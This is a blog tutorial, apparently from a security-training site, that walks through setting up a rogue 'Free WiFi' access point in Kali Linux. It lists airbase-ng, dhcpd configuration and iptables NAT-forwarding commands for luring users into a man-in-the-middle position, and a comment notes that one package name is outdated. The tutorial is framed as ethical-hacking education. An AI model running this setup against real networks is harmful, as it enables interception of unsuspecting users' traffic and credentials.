Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points

April 7, 2016 | Views: 26268

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points

Got free WiFi in the airport? At college? In motels? Or anywhere else?… Before connecting, we must make sure the access points are really broadcasted by
companies/offices/colleges themselves. Maybe the AP is fake (and not really associated with airport/college/motels). Someone might have created a fake AP, so they can track our browsing history, and capture our key strokes (for a MITM and a lot more). BEWARE ! ! ! This all is about ROGUE Wireless Access Points.

 

Tools required:

apt-get: to get new dhcp software

airmon-ng

airbase-ng: turns our kali to AP

dhcpd3: for adding dhcp server functionality.

 

The fake AP process goes like this:

1) Someone connects to fake AP, that we created
2) With DHCP, we provide dynamically changing IP address to them.
3) Similarly, we provide a default gateway, DNS.

 

Let’s begin….

Run:

apt-get update

apt-get upgrade

Let it finish, then run:

apt-get install dhcp3-server -y

(-y is simply yes for any prompts)

(Now, for safety. . .we move the default dhcp conf file to backup, so that we can access it next time if needed)

Run:

mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

(in case of wrong location above, search in Google for the location)

We’re with an empty conf file. We must assign new things here, such as gateway, DNS…for the purpose of hand out to the user who connects to this fake AP.

 

Let’s assume we did as follows in our logical interface:

Network : 192.168.2.0/24

DNS : 8.8.8.8

Gateway : 192.168.2.1

These will create our specified wireless routing network.

Let’s assume our n/w is at 192.168.1.0/24

 

When user connects to the fake AP and wants to surf internet, he goes first from the specified content and then gets routed to original destination via our n/w at: 192.168.1.0/24

 

Let’s work in work in our text editor. You can choose your best one. I’ll use nano:

Run:

nano /etc/dhcp3/dhcpd.conf

You’ll get blank text editor of dhcpd.conf.

Now, write following exactly:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.2.255;
option routers 192.168.2.1;
option domain-name-servers 8.8.8.8;
range 192.168.2.51 192.168.2.100;
}

CTRL+X
Y
ENTER

Run:

airmon-ng start wlan0

airodump-ng mon0

 

Let’s create new ESSID “Free WiFi”:

Run:

airbase-ng –essid “Free Wifi” -c 6 mon0

(The Channel is 6, as seen after airodump-ng mon0, but it may differ on your case.)

Open new tab, or clone the session. Run:

ifconfig at0 up

Next, lets assign the IP to at0. Run:

ifconfig at0 192.168.2.1/24

 

Let’s route the Kali machine with our assigned GW. Run:

route add-net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1

Start DHCP server service. Run:

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0

/etc/init.d/dhcp3-server start

Run:

iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
iptables –table nat –append POSTROUTING –out-interface eth0 -j
MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

 

Finally, wait and watch in the previous tab to see if someone’s associated with Free WiFi or not. Enjoy!

A quick note: This series is only for educational purpose. Practice this series in a lab, in a virtual/separate network and always avoid illegal activities. If you can, then support us in fighting the bad guys.


See the other posts in this series:

Ethical Hacking with Kali Linux – Part 1: Objective
Ethical Hacking with Kali Linux – Part 2: Finding Hidden SSIDS
Ethical Hacking with Kali Linux – Part 3: Bypassing Mac Address Filter
Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless
Ethical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)

By : Bijay Acharya 
Follow me : twitter.com/acharya_bijay

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
7 Comments
  1. This tutorial needs to be updated to facilitate Kali Rolling. The command apt-get install dhcp3-server -y is obsolete. Currently the package is not in the repository. Furthermore apt-get is also obsolete. I believe its best practice to be teaching correct methodology. Simply: apt install isc-dhcp-server

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel